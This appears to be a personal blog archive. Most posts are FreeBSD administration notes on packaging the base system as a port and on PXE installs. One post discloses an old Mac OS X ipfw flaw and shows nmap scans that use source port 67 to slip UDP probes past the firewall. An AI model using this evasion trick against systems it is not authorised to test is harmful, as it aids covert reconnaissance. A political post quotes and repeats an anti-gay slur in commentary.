I will eventually post a Part 0 that describes how I did my build world and initial install of FreeBSD via a MacBook and the FreeBSD ISO. Maybe I'll even type this all up as one document and post it somewhere :-)

Smoking the FreeBSD Crack (and other adventures with ports and packages) Part 3

2007-03-26T07:50:00.000-06:00

Part 2 and Part 1 of this crack adventure are prerequisites...

Okay, tried out some stuff and found out the pkg_add screws up the permissions, but it can take an mtree(1) file during the port creation (and subsequent packaging). If you're not familiar how mtree is used w/ the system, /usr/src/etc/mtree/README and /etc/mtree are good starters


# DST = /space/base+kern-62
cd /usr/ports/local/base_kern
mtree -cdin -k uname,gname,mode -p ${DST} | sed -e 's/ *$//' > /space/BSD.base.mtree # don't do the tail, since we don't have a header yet
cp /space/BSD.base.mtree /usr/local/ftp/pub/
rm distinfo 
make makesum
===>  Vulnerability check disabled, database not found
=> BSD.base.mtree doesn't seem to exist in /usr/ports/distfiles/.
=> Attempting to fetch from ftp://192.168.1.102/pub/.
grep: /usr/ports/local/base_kern/distinfo: No such file or directory
BSD.base.mtree                                100% of   36 kB   36 MBps

NICE! In the Makefile, I had to change the following entries:

Added DISTFILES, and the first entry just points back to the regular package:
DISTFILES= ${DISTNAME}${EXTRACT_SUFX} BSD.base.mtree

Changed the MTREE part:
MTREE_FILE= ${DISTDIR}/BSD.base.mtree
#NO_MTREE= yes

And got more explicit with the tar option (didn't want tar to try to uncompress the mtree...)

do-install:
${TAR} -pjxf ${DISTDIR}/${DISTNAME}${EXTRACT_SUFX} -C ${TARGETDIR}

(make package stuff not shown)


setenv PKG_TMPDIR /space/poo
mkdir /space/poo
setenv PKG_DBDIR /space/test/var/db/pkg
pkg_add /usr/ports/local/base_kern/base_kern-6.2.r_2.tbz 
pkg_delete # some issues on the PKG_TMPDIR and noschg files...
mtree -cdin -k uname,gname,mode -p ${DST} | sed -e 's/ *$//' > /tmp/test.mtree
mtree -cdin -k uname,gname,mode -p /space/base+kern-62 | sed -e 's/ *$//' > /tmp/base+kern.mtree
diff -u /tmp/base+kern.mtree /tmp/test.mtree

No diffs! So, the perms are good and the package installed and was removed cleanly (outside, again, the temp pkg dir stuff)
pkg_info # Remember, PKG_DBDIR is changed
base_kern-6.2.r_2 FreeBSD base + kernel install (no make.conf)

That was it! The base install has been 'ported' and packaged!

Here's the final Makefile:


# New ports collection makefile for:    base_kern
# Date created:        25 March 2007
# Whom:                cykyc
#
# $FreeBSD$
#

PORTNAME=       base_kern
PORTVERSION=    6.2.r
PORTREVISION=   2
CATEGORIES=     sysutils
MASTER_SITES=   ftp://192.168.1.102/pub/

MAINTAINER=     jon.passki@hursk.com
COMMENT=        FreeBSD base + kernel install (no make.conf)

DISTFILES=      ${DISTNAME}${EXTRACT_SUFX} BSD.base.mtree
EXTRACT_ONLY=

USE_BZIP2=      yes
NO_WRKSUBDIR=   yes
NO_BUILD=       yes
# NO_INSTALL=   yes
MTREE_FILE=     ${DISTDIR}/BSD.base.mtree
#NO_MTREE=      yes
PREFIX?=        /space/test

.include 
do-install:
        ${TAR} -pjxf ${DISTDIR}/${DISTNAME}${EXTRACT_SUFX} -C ${TARGETDIR}
.include

Now onto the final installation trickery :-)

Smoking the FreeBSD Crack (and other adventures with ports and packages) Part 2

2007-03-25T13:42:00.000-06:00

So, Part 1 was a hoot. I was able to create a packaged base installation. Now, onto bigger and better things... sysinstall!!!

Goals:

--) PXE boot a client and have it load boot/pxeboot (done)
--) pxeboot loads a 6.2 kernel and NFS roots world (done)
--) /sbin/init happens to be missing from this world, but there's an install.cfg around :-o
--) install.cfg wipes the disks and lays out a partition scheme
--) install.cfg then installs a couple packages via NFS. The first package is the base system (versus using distribution stuff)

Well, let's see if sysinstall can install this wonderful package...

Creating an install.cfg... (sure to contain errors, no need posting it, yet ;-)
# on my macbook / nfs server
mv sbin/init sbin/init,old
mv rescue/init rescue/init,old
sudo ~/mv base_kern-6.2.r_2.tbz /var/exports/freebsd/6.2-R/amd64/packages/All/
Booted...

Hmm, the system panicked since it didn't find init or sysinstall...
But, there's a usr/sbin/sysinstall. It's looking into stand/sysinstall stand points to rescue, but no sysinstall in rescue...
# sure to fail, but let's see...
# on my macbook / nfs server
cp usr/sbin/sysinstall rescue/
Rebooting...

Wow, it got it!
It didn't like the network device config, though... I'll comment out the device config stuff, since it should be configured by pxeboot. If this doesn't work, just use statics.

install.cfg:


# This is a sample installation configuration file for my test machine,
# crate.cdrom.com.
# It is included here merely as a sort-of-documented example.
#
# $FreeBSD: /repoman/r/ncvs/src/usr.sbin/sysinstall/install.cfg,v 1.12 2007/02/18 22:41:41 ceri Exp $

# Turn on extra debugging.
debug=yes
nonInteractive=yes

################################
# My host specific data
hostname=install.hursk.com
domainname=hursk.com
#nameserver=
# defaultrouter=
# ipaddr=
# netmask=255.255.255.240

################################

################################
# Which installation device to use
nfs=X.X.X.X:/private/var/exports/freebsd/6.2-R/amd64
#netDev=bge0                            # 1st Dell 1435 gig e 
#netDev=bge1                            # 2nd Dell 1435 gig e
#tryDHCP=YES
mediaSetNFS
################################

################################
# Select which distributions we want.
#dists=base doc manpages info src sbase ssys kernels GENERIC
#distSetCustom
################################

################################
# Now set the parameters for the partition editor on da0.
disk=da0
partition=all
bootManager=booteasy
diskPartitionEditor
################################

# Disk partitioning.
# All sizes are expressed in 512 byte blocks!
installRoot=/var/mnt
# A 4G root partition
da0s1-1=ufs 2147483648 /var/mnt
# And a 2G swap partition
da0s1-2=swap 4194304 none
# Followed by a /space partition using all remaining space (size 0 = free space)
# and with softupdates enabled (non-zero arg following mountpoint).
da0s1-3=ufs 0 /var/mnt/space 1
# Let's do it!
diskLabelEditor

################################

# OK, everything is set.  Do it!
installCommit

# Install some packages at the end.
package=base_kern-6.2.r_2
packageAdd

Rebooting...
Hmm, needs info it seems...


# defaultrouter=
ipaddr=Y.Y.Y.Y
netmask=255.255.0.0

################################

################################
# Which installation device to use
nfs=X.X.X.X:/private/var/exports/freebsd/6.2-R/amd64
netDev=bge0                            # 1st Dell 1435 gig e 
#netDev=bge1                            # 2nd Dell 1435 gig e
#tryDHCP=YES
mediaSetNFS

Well, that's odd. It has its IP addresses (confirmed via the fixit shell), but it wants me to configure its IP, yet it fails if I try to do that... Trying w/ all the information commented out except the disk stuff. It should fail when it gets to the package part, if not sooner.

K, tinkered some bit. So, everything w/ the network stuff is not included.

Here's the config so far:


# Turn on extra debugging.
debug=yes
nonInteractive=yes

################################
# Now set the parameters for the partition editor on da0.
# Need to write it out before going onto the label editor since the
# device entries are created automatically
disk=da0
partition=all
bootManager=booteasy
diskPartitionWrite
#diskPartitionEditor
################################

installRoot=/mnt
# Disk partitioning.
# All sizes are expressed in 512 byte blocks!
# 1G == 512 * 2 * 1024 * 1024
# 1G == 2 * 1024 * 1024 512-blocks
# A 4G root partition
da0s1-1=ufs 8388608 /
# And a 2G swap partition
da0s1-2=swap 4194304 none
# Followed by a /space partition using all remaining space (size 0 = free space)
# and with softupdates enabled (non-zero arg following mountpoint).
da0s1-3=ufs 0 /space 1
# Commit explicitly so everything is written
diskLabelEditor
diskLabelCommit

################################

# OK, everything is set.  Do it!
#installFilesystems
installCommit

The only problem is that diskLabelEditor fails w/ "Not enough free space on partition: /"

Considering this, plus the package stuff won't really work (needs a media set, which requires a distribution), it seems I've hit a wall w/ sysinstall. It will probably be easier and quicker to just create a script to do this than wrestling w/ sysinstall...

Smoking the FreeBSD Crack (and other adventures with ports and packages) Part 1

2007-03-25T09:39:00.000-06:00

I'm a sick boy.

I want to do the following:

--) PXE boot a client and have it load boot/pxeboot (done)
--) pxeboot loads a 6.2 kernel and NFS roots world (done)
--) /sbin/init happens to be missing from this world, but there's an install.cfg around :-o
--) install.cfg wipes the disks and lays out a partition scheme
--) install.cfg then installs a couple packages via NFS. The first package is the base system (versus using distribution stuff)

/me lays off the crack pipe for a sec...

Reason being, packages rule and distributions suck. I can use one framework (/var/db/pkg) to see what should be installed. Then, using subversion and more magic, any /etc, /usr/local/etc, (and /boot for main boxes) can be rolled up also as packages. This is cool.

So, first steps:


#!/bin/csh
# Build Stuff
cd /usr/src
setenv DISTRO base+kern-62
setenv DST /space/${DISTRO}
mkdir ${DST}
cd /usr/src/sys/amd64/conf/
cp SMP SMP,orig
vi SMP
cd /usr/src
make buildworld DESTDIR=${DST}
make buildkernel KERNCONF=SMP DESTDIR=${DST}
make installworld DESTDIR=${DST}
make distribution DESTDIR=${DST}
make installkernel KERNCONF=SMP DESTDIR=${DST}
# Record stuff for plist, taken from the Porter's Handbook
touch OLD-DIRS
touch pkg-plist
(cd ${DST} && find -d * \! -type d) | sort > pkg-plist
(cd ${DST} && find -d * -type d) | sort | comm -13 OLD-DIRS - | sort -r | sed -e 's#^#@dirrm #' >> pkg-plist
# Grab the base ports
nolo# diff -u /usr/share/examples/cvsup/ports-supfile ports-supfile 
--- /usr/share/examples/cvsup/ports-supfile     Fri Jan 12 07:12:19 2007
+++ ports-supfile       Sun Mar 25 10:38:06 2007
@@ -48,7 +48,7 @@
 #
 # IMPORTANT: Change the next line to use one of the CVSup mirror sites
 # listed at http://www.freebsd.org/doc/handbook/mirrors.html.
-*default host=CHANGE_THIS.FreeBSD.org
+*default host=cvsup9.FreeBSD.org
 *default base=/var/db
 *default prefix=/usr
 *default release=cvs tag=.
@@ -64,7 +64,7 @@
 # The easiest way to get the ports tree is to use the "ports-all"
 # mega-collection.  It includes all of the individual "ports-*"
 # collections,
-ports-all
+#ports-all
 
 # These are the individual collections that make up "ports-all".  If you
 # use these, be sure to comment out "ports-all" above.
@@ -73,7 +73,7 @@
 # other individual collections below. ports-base is a mandatory collection
 # for the ports collection, and your ports may not build correctly if it
 # is not kept up to date.
-#ports-base
+ports-base
 #ports-accessibility
 #ports-arabic
 #ports-archivers

cvsup ports-supfile
mkdir -p /usr/ports/local/base+kern

Okay, the Porter's Handbook wants me to list out the man and info pages. For now, I'll be skipping that... Also, I won't be using the port (for the moment) to actually build the src. That's a cool idea for later.

Here's my first Makefile:


# New ports collection makefile for:    base+kern
# Date created:        25 March 2007
# Whom:                cykyc
#
# $FreeBSD$
#

PORTNAME=       base+kern
PORTVERSION=    6.2.r
PORTREVERSION=  2
CATEGORIES=     sysutil
MASTER_SITES=   ftp://ftp.cs.columbia.edu/archives/X11R5/contrib/

MAINTAINER=     jon.passki@hursk.com
COMMENT=        base + kernel install (no make.conf)

NO_WRKSUBDIR=   yes

.include

Looks like the base ports needs perl to do things, whoopy

pkg_add -r perl
cd /usr/ports
make index
cd local/base+kern
make describe

Grrr!!!!

Looks like "ports-ports-mgmt" is not in the ports-supfile...


nolo# diff -u /usr/share/examples/cvsup/ports-supfile ~/ports-supfile
--- /usr/share/examples/cvsup/ports-supfile     Fri Jan 12 07:12:19 2007
+++ /root/ports-supfile Sun Mar 25 11:13:09 2007
@@ -48,7 +48,7 @@
 #
 # IMPORTANT: Change the next line to use one of the CVSup mirror sites
 # listed at http://www.freebsd.org/doc/handbook/mirrors.html.
-*default host=CHANGE_THIS.FreeBSD.org
+*default host=cvsup9.FreeBSD.org
 *default base=/var/db
 *default prefix=/usr
 *default release=cvs tag=.
@@ -64,7 +64,7 @@
 # The easiest way to get the ports tree is to use the "ports-all"
 # mega-collection.  It includes all of the individual "ports-*"
 # collections,
-ports-all
+#ports-all
 
 # These are the individual collections that make up "ports-all".  If you
 # use these, be sure to comment out "ports-all" above.
@@ -73,7 +73,8 @@
 # other individual collections below. ports-base is a mandatory collection
 # for the ports collection, and your ports may not build correctly if it
 # is not kept up to date.
-#ports-base
+ports-base
+ports-ports-mgmt
 #ports-accessibility
 #ports-arabic
 #ports-archivers

cd /usr/ports/ports-mgmt/portlint && make install
cd /usr/ports/local/base+kern/ && rehash
portlint
FATAL: no /usr/ports/local/base+kern/pkg-descr in ".".
FATAL: Makefile: extra item "PORTREVERSION" placed in the PORTNAME section.
WARN: Makefile: only one MASTER_SITE configured. Consider adding additional mirrors.
WARN: Makefile: using "+" in PORTNAME. You should modify "base+kern".
WARN: Makefile: COMMENT should begin with a capital, and end without a period
FATAL: no /usr/ports/local/base+kern/distinfo in ".".
3 fatal errors and 3 warnings found.

Whoops!!

--) F-n sakes... blew away the ports-mgmt to qwell make index
--) Changed the port name and directory; updated the INDEX file
--) Created a pkg-descr
--) Copied the pkg-plist file into the dir
--) Added ftp user...


nolo# adduser
Username: FTP
Full name: ^C
nolo# adduser
Username: ftp
Full name: ftp
Uid (Leave empty for default): 21
Login group [ftp]: 
Login group is ftp. Invite ftp into other groups? []: no
Group no does not exist!
Login group is ftp. Invite ftp into other groups? []: 
Login class [default]: 
Shell (sh csh tcsh nologin) [sh]: nologin
Home directory [/home/ftp]: /usr/local/ftp/./pub
Use password-based authentication? [yes]: no
Lock out the account after creation? [no]: 
Username   : ftp
Password   : 
Full Name  : ftp
Uid        : 21
Class      : 
Groups     : ftp 
Home       : /usr/local/ftp/./pub
Shell      : /usr/sbin/nologin
Locked     : no
OK? (yes/no): yes
adduser: INFO: Successfully added (ftp) to the user database.
Add another user? (yes/no): no

Added info to rc.conf
[...]
ftpd_enable="YES"
ftpd_flags="-A -r"
[...]

Hardened a bit:
chmod 700 /usr/local/ftp
chown root !$
mkdir -p /usr/local/ftp/etc
cd /usr/local/ftp/etc
ln /etc/pwd.db pwd.db
ln /etc/group group
chmod 444 *
chmod 555 .
cd ..
chmod 755 pub
mv pub/.* .
chown root .*
chown root pub
/etc/rc.d/ftpd start

New Makefile:


# New ports collection makefile for:    base_kern
# Date created:        25 March 2007
# Whom:                cykyc
#
# $FreeBSD$
#

PORTNAME=       base_kern
PORTVERSION=    6.2.r
PORTREVISION=   2
CATEGORIES=     sysutils
MASTER_SITES=   ftp://192.168.1.102/pub/

MAINTAINER=     jon.passki@hursk.com
COMMENT=        FreeBSD base + kernel install (no make.conf).

USE_BZIP2=      yes
NO_WRKSUBDIR=   yes
EXTRACT_ONLY=
NO_BUILD=       yes
NO_MTREE=       yes
PREFIX?=       /space/test

.include 
do-install:
        ${TAR} -pjxf ${DISTDIR}/${DISTFILES} -C ${TARGETDIR}
.include 

#distinfo creation
make makesum

WHOOP!!!
did a make deinstall and make package as a test. need to take care of the chflags -R noschg part...
Also, need to make changes to allow for different prefixes to the ports, for naming of jails...

Hmmm... need to setup the plist to allow for empty directories...


(cd ${DST} && find -d * -type d) | sort | comm -13 OLD-DIRS - | sort -r | awk '{print "@exec mkdir -p %D/" $0; print "@dirrm "$0}' >> pkg-plist

That works...

Now just need to fix up the chflags stuff...

( cd ${DST} && find -d * -flags +schg ) | sort -r | sed -e 's#^#@unexec chflags noschg #' >> pkg-plist

Oh, and the dot files in the / directory...

cd ${DST} && find -f . \! -type d) |  sed -e 's#^\.\/##' | sort > pkg-plist

... and all combined:


# Record stuff for plist, taken from the Porter's Handbook
rm pkg-plist
rm OLD-DIRS
touch OLD-DIRS
touch pkg-plist
(cd ${DST} && find -f . \! -type d) |  sed -e 's#^\.\/##' | sort > pkg-plist
(cd ${DST} && find -d * -flags +schg ) | sort -r | sed -e 's#^#@unexec chflags noschg %D/#' >> pkg-plist
(cd ${DST} && find -d * -type d) | sort | comm -13 OLD-DIRS - | sort -r | awk '{print "@exec mkdir -p %D/" $0; print "@dirrm "$0}' >> pkg-plist

Hmm, got the ordering wrong there... Looks like the chflags have to be executed first.


# Record stuff for plist, taken from the Porter's Handbook
rm pkg-plist
rm OLD-DIRS
touch OLD-DIRS
touch pkg-plist
(cd ${DST} && find -d * -flags +schg ) | sort -r | sed -e 's#^#@unexec chflags noschg %D/#' > pkg-plist
(cd ${DST} && find -f . \! -type d) |  sed -e 's#^\.\/##' | sort >> pkg-plist
(cd ${DST} && find -d * -type d) | sort | comm -13 OLD-DIRS - | sort -r | awk '{print "@exec mkdir -p %D/" $0; print "@dirrm "$0}' >> pkg-plist

WHOOP!


nolo# make package PACKAGES=/space
===>  Installing for base_kern-6.2.r_2
===>   Generating temporary packing list
===>  Checking if sysutils/base_kern already installed
/usr/bin/tar -pjxf /usr/ports/distfiles/base_kern-6.2.r.tar.bz2 -C /space/test
===>   Registering installation for base_kern-6.2.r_2
===> SECURITY REPORT: 
      This port has installed the following binaries, which execute with
      increased privileges.
/space/test/usr/sbin/mrinfo
[...]
/space/test/usr/sbin/ppp

      This port has installed the following files, which may act as network
      servers and may therefore pose a remote security risk to the system.
/space/test/usr/sbin/rip6query
[...]
/space/test/usr/sbin/inetd

      This port has installed the following startup scripts, which may cause
      these network services to be started at boot time.
/space/test/etc/rc.d/dmesg
[...]
/space/test/etc/rc.d/geli2

      If there are vulnerabilities in these programs there may be a security
      risk to the system. FreeBSD makes no guarantee about the security of
      ports included in the Ports Collection. Please type 'make deinstall'
      to deinstall the port if this is a concern.

      For more information, and contact details about the security
      status of this software, see the following webpage: 
http://www.hursk.com
===>  Building package for base_kern-6.2.r_2
Creating package /space/All/base_kern-6.2.r_2.tbz
Registering depends:.
Creating bzip'd tar ball in '/space/All/base_kern-6.2.r_2.tbz'
nolo# make deinstall
===>  Deinstalling for sysutils/base_kern
===>   Deinstalling base_kern-6.2.r_2
nolo#

Integrity, Reputation, Honor, sometimes...

2007-03-17T08:53:00.000-06:00

My biz partner and I had a great breakfast yesterday with a former colleague we'll call Rico. During the discussion, Uncle Rico as I usually call him, talked about some two-faced stories he heard from yet another mutual former colleague. None of us are free from sin. Heck, I probably committed five sins before I even had my first cup of coffee (and I'm an atheist ;-) For me, though, I hope I never violate my integrity. (Or, if I do, at least have a High Access Complexity and a Local Access Vector to reduce my score.) If I do, I know I have fallen far...

As my pops would say, you can trust a thief to steal from you but you can't trust a liar. You'll never know when you're being lied to.

Mac OS X 10.4 ipfw issue (silly post on old bug report from 2005)

2007-03-12T06:17:00.000-06:00

Enable the "Block UDP Traffic" advanced option under Security Preferences -> Sharing -> Firewall. The IPFW rules created allow for full UDP access if the source port is either 5353 or 67/UDP.


% sudo ipfw list
Password:
02000 allow ip from any to any via lo*
02010 deny ip from 127.0.0.0/8 to any in
02020 deny ip from any to 127.0.0.0/8 in
02030 deny ip from 224.0.0.0/3 to any in
02040 deny tcp from any to 224.0.0.0/3 in
02050 allow tcp from any to any out
02060 allow tcp from any to any established
12190 deny log tcp from any to any
20310 allow udp from any to any dst-port 53 in
20320 allow udp from any to any dst-port 68 in
20321 allow udp from any 67 to me in
20322 allow udp from any 5353 to me in
20340 allow udp from any to any dst-port 137 in
20350 allow udp from any to any dst-port 427 in
20360 allow udp from any to any dst-port 631 in
20370 allow udp from any to any dst-port 5353 in
30510 allow udp from me to any out keep-state
30520 allow udp from any to any in frag
35000 deny log udp from any to any in
65535 allow ip from any to any

Rules 20321 and 20322 will allow any inbound UDP packet, regardless of the next UDP rules if the source port is 67 or 5353 respectively. For example, these are my open UDP ports:


netstat -anp udp
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
udp4       0      0  *.*                    *.*                    
udp4       0      0  *.5353                 *.*                    
udp4       0      0  192.168.2.62.50012     *.*                    
udp4       0      0  127.0.0.1.49159        127.0.0.1.1022         
udp4       0      0  127.0.0.1.49158        127.0.0.1.1022         
udp4       0      0  127.0.0.1.1022         *.*                    
udp4       0      0  127.0.0.1.49156        127.0.0.1.1023         
udp4       0      0  127.0.0.1.1023         *.*                    
udp4       0      0  192.168.2.62.123       *.*                    
udp4       0      0  127.0.0.1.123          *.*                    
udp4       0      0  *.123                  *.*                    
udp4       0      0  *.631                  *.*                    
udp6       0      0  *.5353                 *.*                    
udp4       0      0  *.5353                 *.*                    
udp4       0      0  127.0.0.1.1033         *.*

With the above rules, no traffic should be allowed inbound to NTP (123/udp). I disabled the Stealth rule to get ICMP destination port unreachables.


% sw_vers
ProductName:    Mac OS X
ProductVersion: 10.4.3
BuildVersion:   8F46

(ibook == 192.168.2.62)

[jon@dominique] ~ {105}> sudo nmap -P0 -n -v -sU -p 1,123,631,500 192.168.2.62
Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-12-21 21:52 CST
Initiating UDP Scan against 192.168.2.62 [4 ports] at 21:52
The UDP Scan took 3.03s to scan 4 total ports.
Host 192.168.2.62 appears to be up ... good.
Interesting ports on 192.168.2.62:
PORT    STATE         SERVICE
1/udp   open|filtered tcpmux
123/udp open|filtered ntp
500/udp open|filtered isakmp
631/udp open|filtered unknown

Nmap finished: 1 IP address (1 host up) scanned in 3.039 seconds
               Raw packets sent: 8 (224B) | Rcvd: 0 (0B)

So, nothing was sent out, since three of the ports were blocked and one was open (no ICMP error on the open port). Here's the logs:


Dec 21 21:51:02 ibook ipfw:  35000 Deny UDP 192.168.2.12:50869 192.168.2.62:500 in via en1
Dec 21 21:51:02 ibook ipfw:  35000 Deny UDP 192.168.2.12:50869 192.168.2.62:1 in via en1
Dec 21 21:51:02 ibook ipfw:  35000 Deny UDP 192.168.2.12:50869 192.168.2.62:123 in via en1
Dec 21 21:51:04 ibook ipfw:  35000 Deny UDP 192.168.2.12:50870 192.168.2.62:123 in via en1
Dec 21 21:51:04 ibook ipfw:  35000 Deny UDP 192.168.2.12:50870 192.168.2.62:1 in via en1
Dec 21 21:51:04 ibook ipfw:  35000 Deny UDP 192.168.2.12:50870 192.168.2.62:500 in via en1

nmap sends out a couple packets per query. Now, here's w/ a set source port:


[jon@dominique] ~ {106}> sudo nmap -P0 -n -v -sU --source_port 67 -p 1,123,631,500 192.168.2.62

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-12-21 21:52 CST
Initiating UDP Scan against 192.168.2.62 [4 ports] at 21:52
The UDP Scan took 1.23s to scan 4 total ports.
Host 192.168.2.62 appears to be up ... good.
Interesting ports on 192.168.2.62:
PORT    STATE         SERVICE
1/udp   closed        tcpmux
123/udp open|filtered ntp
500/udp closed        isakmp
631/udp open|filtered unknown

Nmap finished: 1 IP address (1 host up) scanned in 1.237 seconds
               Raw packets sent: 6 (168B) | Rcvd: 2 (112B)

So, 1 and 500/udp got ICMP packets back. Also, no ports were blocked in the log, since they never got to rule #35000 anyway. Not a positive test, mind you.

On Ann Coulter and Hatred

2007-03-04T13:49:00.000-06:00

I'm a Big Gay Al. A lot of my friends are also Big Gay Al's or Dykes on Bikes (sorry, no wikipedia article yet on them!). We're not faggots, although some of us might smoke faggots if we're from the other side of the pond. So, if you haven't heard, Ann Coulter said on March 2nd... oh, shit, might as well just quote her:

"I was going to have a few comments on the other Democratic presidential candidate John Edwards, but it turns out you have to go into rehab if you use the word 'faggot,' so I — so kind of an impasse, can't really talk about Edwards,"

-- Ann Coulter, March 2nd, 2007 at the Conservative Political Action Conference in Washington, D.C.

Without getting too emotional, yet, let's step way back and see why she's doing this...

To explain this, I have to call up the image of George W. Bush (no references needed, we all know Dubya). He and his puppeteer, Karl Rove, know how to rile people up. They change discourse from a nice logical and rational level, where two completely different people can agree to disagree, down to a dirty and emotional level where fear, uncertainty, and doubt (FUD) only live. They did this so well that we as a society were bamboozled into having him twice be our president. Why? Because of wonderful statements just like Ann Coulter made. Be emotional at all times to divide the people. You're either appauled, apathetic, or amused at all of these loony comments.

Such statements make the target of the hate feel hatred at the speaker, but more importantly, the people that eat it up just feel good about it.

People clapped at this joke.

They actually thought it was funny.

That emotional bond created cannot be broken by pure logical discourse. Such people cannot be reasoned with. So, it's like drinking the Kool-Aid, once they've had a taste there isn't any going back.

But here's the brilliance of Ann Coulter's statement. Not only did she make a divisive statement to have others drink the Kool-Aid, she might make Mitch Romney sell his soul. Mitch Romney, by the way, is the currently leading Republican presidential candidate.

Say wha? What the fuck am I talking about?! And why should we care?

The 2008 U.S. presidential election is going to be as nasty as the last two if people such as the attendees of the Conservative Political Action Conference are any indication of those with power. Mitch Romney now has two options: he can discredit Ann Coulter and publicly denounce her statement as vile or not. If he does the prior, he will jetison the deeply conservative side of the party, weakening his chances to become President. We would expect this out of a leader, but Presidents aren't always good leaders :-) If he doesn't come out against the remark, by either ignoring it or stating something to the affect that everyone has a right to freedom of speech, then he is unfortunately once again dividing our society. This also allows that deep and powerful conservative side to retain some sway over our society. Which just means the bullshit will be happening at least one more time.

So, by this one perceived insult to faggots (it really doesn't bother me, since I could give a rat's ass and I'm damn comfortable with who I am), Ann Coulter is actually trumpeting a rally cry for the conservatives to recover their waning power. A fitting analogy is that of an aging lion: once he realizes his power is waning, he becomes more ferocious towards the youthful lions moving in on his territory. Notice that none of the serious Republican front-runners are deeply conservative. Romney, Guilanni, and McCain, *gasp*, actually have some liberal ideals. They are the threat to the deep conservative establishment, not you nor I. Once the Republicans elect someone more moderate, then the shadow of Bush/Rove Inc., will pass, brining again light to our society.

So, give it time. It's actually funny to see people like Ann Coulter not go gentle into that good night. It just reaffirms that their time is coming. And being Minnesotan, I can appreciate a good thaw after a rough winter, for spring is a site to see here. Won't it be a site to see in our society once the conservative winter has passed, too?

Good Night and Good Luck

Jon

Cellblocks

2005-01-12T17:25:00.000-06:00

FreeBSD has a feature called jail that allows for process segregation among other things. I wish to see it extended for system administration outside of individual virtual systems. I wish to see it extended to allow for service provisioning and management without having the sysadmin dink around with the yucky stuff.

The concept is what I originally called a zone, but since Sun Microsystems uses that nominclature for Solaris, the term 'block' or 'cellblock' may cause less confusion. A cellblock is a collection of jails that share a similar levels of security assurance. An example of a security assurance level is a DMZ. It is a logical and/or physical partition that offers a level of trust as seen by the sysadmin. This trust may be based on source or destination networks, data classification, or whatnot. The premise is the sysadmin has identified and catagorized these partitions. A basic example would be an internal, external, and DMZ setup.

Now, what I wish to see is a setup that allows a sysadmin to provision or move services based on zones, versus on a system setup. If 10 different systems are setup within the same cellblock, then anyone of them could run the service without compromising the security assurances in place. It may not make sense to move a high-load service to a slow system, but it should not cause any security issues during the move.

Ideally, if the host is wholely running all services within cellblocks, any one of those services can get migrated, or new services can get added, without security concerns. That's the idea, anyways :-)

Here's some scratch notes on how I would implement this on FreeBSD.

--) each jail in a cell block carries a generic configuration
fstab.generic
/.CURDIR /${CELLBLOCK_MNT}

for each of these generic files, the cell block will create an
instance tuned specifically. These files do not migrate.
fstab.local

What this means is that each jail will have mounts that need to me honored by the cellblock. If the cellblock cannot honor the mounts, the jail will not function correctly. The naming scheme should be that generic names can be used so if a systems has a different drive setup, it still can take part in the cellblock.

--) each jail shall use a unique fqdn. Its IP address can be either
dynamic (dhclient w/ pseudo call) or static.

DHCP can assign alias IP addresses to interfaces w/o killing the defined one. Great for IP preservation, since the jail can be setup to request the IP associated w/ its FQDN.

--) each jail shall list out what tcp/udp ports it needs open

For fw configuration.

--) All this shall be captured in a rc.conf'ish file

Deity bless rc files.

--) The cell blocks will have a pseudo ports creation that will list
out the dependencies. One setup, the cell block shall store its
general variables for future reference. E.g.:

/usr/local/etc/rc.d/cellblock/cellblock_X
repository of per-bloc instances
contains variable-to-data mapping, e.g.:
CELLBLOCK_MNT=/usr/blocks/blocks_X
CELLBLOCK_INT=fxp0
CELLBLOCK_RANGE=10/8

This gets into the nasty on how a system can ensure it can handle a specific cellblock. So, imagine a /usr/ports entry where one just had to 'make && make install' to install a cellblock. All dependencies would be taken care of, automagically!

Thoughts? Comments?

SYN

2004-12-03T21:34:00.000-06:00

Here's to documentation!